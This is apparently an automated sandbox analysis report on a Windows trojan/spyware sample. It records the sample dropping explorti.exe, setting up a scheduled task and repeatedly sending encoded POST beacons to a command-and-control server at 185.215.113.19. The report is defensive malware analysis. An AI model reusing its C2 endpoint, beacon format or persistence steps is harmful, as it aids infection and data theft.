                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.19 185.215.113.19
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F5BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00F5BD60
                    Source: unknownHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/=
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2883573047.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php&
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php(
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php1
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php54
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpL3
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpQ
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpV
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpppData
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phprosoft

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F54CF06_2_00F54CF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F930686_2_00F93068
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F5E4406_2_00F5E440
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F87D836_2_00F87D83
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F54AF06_2_00F54AF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F9765B6_2_00F9765B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F92BD06_2_00F92BD0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F9777B6_2_00F9777B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F987206_2_00F98720
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F96F096_2_00F96F09
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe 589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
                    Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: setup.exeStatic PE information: Section: ZLIB complexity 0.9998612534153005
                    Source: setup.exeStatic PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9998612534153005
                    Source: explorti.exe.0.drStatic PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: sspicli.dllJump to behavior
